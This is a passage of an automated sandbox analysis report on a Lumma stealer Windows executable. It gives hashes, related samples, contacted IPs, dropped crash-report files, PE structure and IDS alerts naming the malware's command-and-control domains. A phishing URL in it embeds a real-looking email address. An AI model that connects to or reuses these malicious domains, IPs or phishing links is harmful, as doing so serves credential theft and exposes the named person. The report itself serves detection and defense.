                                                                                                                                              sergei-esenin.comfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.206.204
                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.206.204
                                                                                                                                              SecuriteInfo.com.Win32.Evo-gen.15503.22039.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.206.204
                                                                                                                                              SecuriteInfo.com.Win32.Evo-gen.11764.10915.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.53.8
                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.53.8
                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.53.8
                                                                                                                                              SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.206.204
                                                                                                                                              SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.53.8
                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.53.8
                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.206.204
                                                                                                                                              steamcommunity.comfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.102.49.254
                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.102.49.254
                                                                                                                                              SecuriteInfo.com.Win32.Evo-gen.15503.22039.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.102.49.254
                                                                                                                                              SecuriteInfo.com.Win32.Evo-gen.11764.10915.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.102.49.254
                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.102.49.254
                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.102.49.254
                                                                                                                                              SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.102.49.254
                                                                                                                                              SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.102.49.254
                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.102.49.254
                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.102.49.254

                                                                                                                                              ASNs

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              CLOUDFLARENETUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.206.204
                                                                                                                                              https://60ms64xz.r.eu-west-1.awstrack.me/L0/https:%2F%2Fnym1-ib.adnxs.com%2Fclick2%3Fe=wqT_3QKhAfCBoQAAAAMAxBkFAQj1xf22BhCN5rHDq8rIsXYY6OvVqs3R1c9aIPXtswsoykEwhx04AkDV-qXwAUiY1VJQAFoDVVNEYgNVU0RorAJw-gF4kfdrgAG5zAOIAQGQAQGYAQWgAQKpAVM7_DVZo44_sQHWE0zrJXyFP7kBAAAAwMzM7D_BAREUDMkBUDsJKDDYAQDgAQDwAdEO-AEA%2Fs=555aa6e5683ce51c048a98b83e6a923b5a8d9a2c%2Fbcr=AAAAAAAA8D8=%2Fcnd=%25218hVjbgiv18IdENX6pfABGJjVUiAAKAAxmpmZmZmZuT86CU5ZTTI6NTI1NECoR0kAAAAAAADwP1EAAAAAAAAAAFkAAAAAAAAAAGEAAAAAAAAAAGkAAAAAAAAAAHEAAAAAAAAAAHgAiQEAAAAAAADwPw..%2Fcca=MzcxOSNOWU0yOjUyNTQ=%2Fbn=58937%2Fclickenc=http%253A%252F%252Faa.ns.agingbydesignministry.org%3FMlcinsurance=grant.harpur@mlcinsurance.com.au/1/0102019284444055-c8ec5399-450a-413f-acab-546e07ef32e7-000000/Qxx4uNY6H1RoEfFUkvzFba2SPik=395Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                              • 1.1.1.1
                                                                                                                                              http://painel.simpatiafm.com.br/Get hashmaliciousUnknownBrowse
                                                                                                                                              • 162.247.243.29
                                                                                                                                              SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              • 104.20.86.8
                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.206.204
                                                                                                                                              SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              • 172.67.35.220
                                                                                                                                              SecuriteInfo.com.Trojan.Siggen29.50366.26295.18671.exeGet hashmaliciousXmrigBrowse
                                                                                                                                              • 104.20.4.235
                                                                                                                                              SecuriteInfo.com.Win32.Evo-gen.15503.22039.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 172.67.206.204
                                                                                                                                              SecuriteInfo.com.Win32.Evo-gen.11764.10915.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.53.8
                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.53.8
                                                                                                                                              AKAMAI-ASUSfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.102.49.254
                                                                                                                                              SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              • 23.212.89.10
                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.102.49.254
                                                                                                                                              SecuriteInfo.com.Win32.Trojan.Agent.1MWNV4.31044.30727.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              • 2.19.126.150
                                                                                                                                              SecuriteInfo.com.Win32.Evo-gen.15503.22039.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.102.49.254
                                                                                                                                              SecuriteInfo.com.Win32.Evo-gen.11764.10915.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.102.49.254
                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.102.49.254
                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.102.49.254
                                                                                                                                              SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.102.49.254
                                                                                                                                              SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.102.49.254

                                                                                                                                              JA3 Fingerprints

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.53.8
                                                                                                                                              • 104.102.49.254
                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.53.8
                                                                                                                                              • 104.102.49.254
                                                                                                                                              SecuriteInfo.com.Win32.Evo-gen.15503.22039.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.53.8
                                                                                                                                              • 104.102.49.254
                                                                                                                                              SecuriteInfo.com.Win32.Evo-gen.11764.10915.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.53.8
                                                                                                                                              • 104.102.49.254
                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.53.8
                                                                                                                                              • 104.102.49.254
                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.53.8
                                                                                                                                              • 104.102.49.254
                                                                                                                                              SecuriteInfo.com.Variant.Lazy.606929.21165.21266.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.53.8
                                                                                                                                              • 104.102.49.254
                                                                                                                                              SecuriteInfo.com.Variant.Lazy.606929.30223.9667.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.53.8
                                                                                                                                              • 104.102.49.254
                                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                              • 104.21.53.8
                                                                                                                                              • 104.102.49.254
                                                                                                                                              https://onedoc3.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                              • 104.21.53.8
                                                                                                                                              • 104.102.49.254

                                                                                                                                              Dropped Files

                                                                                                                                              No context

                                                                                                                                              Created / dropped Files

                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_file.exe_2f26e4b65edfc9809a16d7533fcfcfa7c28d99cc_852b229c_359a2174-9da5-4242-a49d-a70ccd585713\Report.wer

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:data
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):65536
                                                                                                                                              Entropy (8bit):1.04698977012976
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:PFt7LLtpYlcv7PlktS0BU/b03juF2nnzuiF2Z24IO8ThB:TEE7N6ZBU/wjfnzuiF2Y4IO8L
                                                                                                                                              MD5:29CC487FB04C064DB9B6FCFF3BA08070
                                                                                                                                              SHA1:F72B770CE4428D81E389641A551471A170A044B9
                                                                                                                                              SHA-256:129907DA8563E247CEC4EFD070CA9429D227DD717BCE5CB89D2BA856BEB38CFB
                                                                                                                                              SHA-512:C0B301C372D1F5C5A1CEF4A9A71D30C2B2F64F63828BE7A42FB764886BCB07BBB082A61BD132CDC37315EABE0A009A0D4BA3728803D6A2DA0FC431A0A5C9C32E
                                                                                                                                              Malicious:true
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.3.3.7.1.9.1.2.5.2.3.2.7.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.3.3.7.1.9.1.8.1.4.8.3.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.5.9.a.2.1.7.4.-.9.d.a.5.-.4.2.4.2.-.a.4.9.d.-.a.7.0.c.c.d.5.8.5.7.1.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.1.0.9.6.4.4.2.-.1.8.1.e.-.4.1.e.a.-.a.a.6.0.-.c.5.1.b.5.3.e.f.7.8.e.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.9.b.8.-.0.0.0.1.-.0.0.1.5.-.a.d.e.d.-.8.0.0.c.c.b.1.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.e.4.9.2.d.7.6.8.e.7.9.7.3.1.6.2.4.b.c.d.f.2.e.7.6.1.5.f.9.1.8.0.0.0.0.f.f.f.f.!.0.0.0.0.0.e.e.2.5.3.6.b.6.9.b.5.b.2.6.8.5.8.6.2.8.1.b.e.8.d.7.9.2.5.d.7.5.f.6.e.f.0.1.6.!.f.i.l.e...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0.

                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERA369.tmp.dmp

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:Mini DuMP crash report, 15 streams, Sun Oct 13 23:53:11 2024, 0x1205a4 type
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):301590
                                                                                                                                              Entropy (8bit):1.4926084128973272
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:g88Sg5ABn3q/l3xGZjjySld3xryLcK4eEkdIGI:g8/gH/JxGZjj/l3mdIGI
                                                                                                                                              MD5:E36AFFA7DC1413D5F691C289FFE70A5A
                                                                                                                                              SHA1:843F6E42BB7632E6CF58F939AC074DF220D3CC37
                                                                                                                                              SHA-256:07E018750EDC8AB912614B208EC08E01D96322F08115A19F2192ADDF10663415
                                                                                                                                              SHA-512:764117DF71541579CF26C85AE54AEBE140D568DA43AC976CD837541765A4C870046811A20B030E25BE5E4979867328C5265A12F82B6AF50A308B51D4188DF088
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:MDMP..a..... .......g].g........................T...............,'..........P...........`.......8...........T............K..>N...........'...........)..............................................................................eJ......L*......GenuineIntel............T...........b].g.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERA4C2.tmp.WERInternalMetadata.xml

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):8288
                                                                                                                                              Entropy (8bit):3.6915425028827507
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:R6l7wVeJqCJ6MO6Y2DbSUKgmfBGeFprd89biysfycWm:R6lXJn6l6YmSUKgmfZiixfyU
                                                                                                                                              MD5:D8043EDB028B85224DD7A6B68D793806
                                                                                                                                              SHA1:36CE6158551C849D63C9A2175640C78CD18F6D88
                                                                                                                                              SHA-256:4ED9A683AF38C40A28669D78A94A6F0B2DE6BB4AC7B0687EACB306314DD1D4F0
                                                                                                                                              SHA-512:EA1D8831C7EA7037C112CD8E11C0B37F0D55A79CAB9021B0E60264678B9F1B89558704281640249ECF2998AF9AEF23D54B50B4C9EED6A9ECB43084A550F2EC0B
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.4.8.8.<./.P.i.

                                                                                                                                              C:\ProgramData\Microsoft\Windows\WER\Temp\WERA511.tmp.xml

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):4542
                                                                                                                                              Entropy (8bit):4.425317666844599
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:cvIwWl8zs4Jg77aI9BuWpW8VY5Ym8M4JjlFi7+q8CKk9gDOed:uIjf+I7fP7VlJa59gDOed
                                                                                                                                              MD5:A7A09E157915B2A8DB18D451330DE549
                                                                                                                                              SHA1:CC309CA7C660813CBAD88BD4F719A2C45FE99269
                                                                                                                                              SHA-256:CCB08020399ACC6A60506C9CDBF2845DC8659A3705B128679AD7AE5FA158839F
                                                                                                                                              SHA-512:38B3BF1AE2E9C726B495ED3F05FB581C48E5A8AF3E21E1491B4E7730A20B6A94D1F109CCE37F5A9242044EC243F858606DFC88D7FEF5E67032C516C63FCE9220
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="542335" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                              C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                              File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1835008
                                                                                                                                              Entropy (8bit):4.468434709637196
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:WzZfpi6ceLPx9skLmb0fBZWSP3aJG8nAgeiJRMMhA2zX4WABluuNbjDH5S:4ZHtBZWOKnMM6bFp9j4
                                                                                                                                              MD5:F288269959C8532FBEB415AEBF033E3F
                                                                                                                                              SHA1:27A873E70D475908B6048CE2EC18C20D07634CAE
                                                                                                                                              SHA-256:43F51ED6AB06CE19A651125C84DA731C09DCB881C3A163BBC4EE70BE9671E3EB
                                                                                                                                              SHA-512:5C69BA08B91AC60A527124D8EDD13D856C4CC55BE1E3FAE025E59AAADF84969AAF2FF35C61D8DE948C01A9CC4318FB0BCED8FEC427270A57412981A64BB94EDF
                                                                                                                                              Malicious:false
                                                                                                                                              Reputation:low
                                                                                                                                              Preview:regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmZ.e.................................................................................................................................................................................................................................................................................................................................................7.s;........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                              Static File Info

                                                                                                                                              General

                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                              Entropy (8bit):6.524989015983574
                                                                                                                                              TrID:
                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                              File name:file.exe
                                                                                                                                              File size:2'920'960 bytes
                                                                                                                                              MD5:6d7169d90896f0347f35da82056fc955
                                                                                                                                              SHA1:0ee2536b69b5b268586281be8d7925d75f6ef016
                                                                                                                                              SHA256:68d7b677a0700c7a4f086354054347ba5abb50fa805fc67ef4d580643857dfb0
                                                                                                                                              SHA512:e67de07dcb5630749d7c7e0467fc65bdf58cd6a9435f931b689f7e4825e64b5f5bce7d9554d2c72cf0f60e0608f40b48fbb9031977a95078f48394592f4acb27
                                                                                                                                              SSDEEP:49152:lROttiocL5XhDwRaY6hUOY+VOj0m6AKKKKKKKKKKKKKKKKKKKKKKKK9mtcvrKSTS:l4ttiocL5RDwRZi7/m6AKKKKKKKKKKKA
                                                                                                                                              TLSH:4FD54BB2A745B1CFD48A17748467CE82E95D42FA07111CC7A96DA47BBD73CC222B6C38
                                                                                                                                              File Content Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...J..f..............................0...........@..........................@0.......,...@.................................W...k..

                                                                                                                                              File Icon

                                                                                                                                              Icon Hash:00928e8e8686b000

                                                                                                                                              Static PE Info

                                                                                                                                              General

                                                                                                                                              Entrypoint:0x701000
                                                                                                                                              Entrypoint Section:.taggant
                                                                                                                                              Digitally signed:false
                                                                                                                                              Imagebase:0x400000
                                                                                                                                              Subsystem:windows gui
                                                                                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                              Time Stamp:0x66FFF14A [Fri Oct 4 13:44:42 2024 UTC]
                                                                                                                                              TLS Callbacks:
                                                                                                                                              CLR (.Net) Version:
                                                                                                                                              OS Version Major:6
                                                                                                                                              OS Version Minor:0
                                                                                                                                              File Version Major:6
                                                                                                                                              File Version Minor:0
                                                                                                                                              Subsystem Version Major:6
                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                              Import Hash:2eabe9054cad5152567f0699947a2c5b

                                                                                                                                              Entrypoint Preview

                                                                                                                                              Instruction
                                                                                                                                              jmp 00007F8E4C6EE13Ah
                                                                                                                                              pshufw mm5, qword ptr [eax+eax], 00h
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add cl, ch
                                                                                                                                              add byte ptr [eax], ah
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [ebx], al
                                                                                                                                              or al, byte ptr [eax]
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax+0Ah], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              push es
                                                                                                                                              add byte ptr [eax], 00000000h
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              push es
                                                                                                                                              or al, byte ptr [eax]
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], dh
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax+eax], ah
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              and dword ptr [eax], eax
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              or al, 80h
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              push es
                                                                                                                                              or al, byte ptr [eax]
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], dh
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax+eax], ah
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              and dword ptr [eax], eax
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              push es
                                                                                                                                              add byte ptr [eax], 00000000h
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              adc byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add ecx, dword ptr [edx]
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al
                                                                                                                                              add byte ptr [eax], al

                                                                                                                                              Data Directories

                                                                                                                                              NameVirtual AddressVirtual Size Is in Section
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x5f0570x6b.idata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x5f1f80x8.idata
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                              Sections

                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                              0x10000x5d0000x25e005a4d86de4dd8e822aa964be57e3efdc9False0.9994972153465347data7.979992448836906IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                              .rsrc 0x5e0000x10000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                              .idata 0x5f0000x10000x200fe72def8b74193a84232a780098a7ce0False0.150390625data1.04205214219471IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                              twgwikas0x600000x2a00000x29fc0025b3224971e772eaf2f04c0dd76a86d4unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                              wmevupse0x3000000x10000x4003639ac4a12c4565a3edd98d5098b5b0eFalse0.7607421875data6.0199123399601175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                              .taggant0x3010000x30000x2200f155ebf28c8685a6637a08a87d2f189aFalse0.05847886029411765DOS executable (COM)0.6979392326316429IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                                              Imports

                                                                                                                                              DLLImport
                                                                                                                                              kernel32.dlllstrcpy

                                                                                                                                              Network Behavior

                                                                                                                                              Suricata IDS Alerts

                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                              2024-10-14T01:53:08.553926+02002056471ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site)1192.168.2.6545101.1.1.153UDP
                                                                                                                                              2024-10-14T01:53:08.567957+02002056485ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store)1192.168.2.6505851.1.1.153UDP
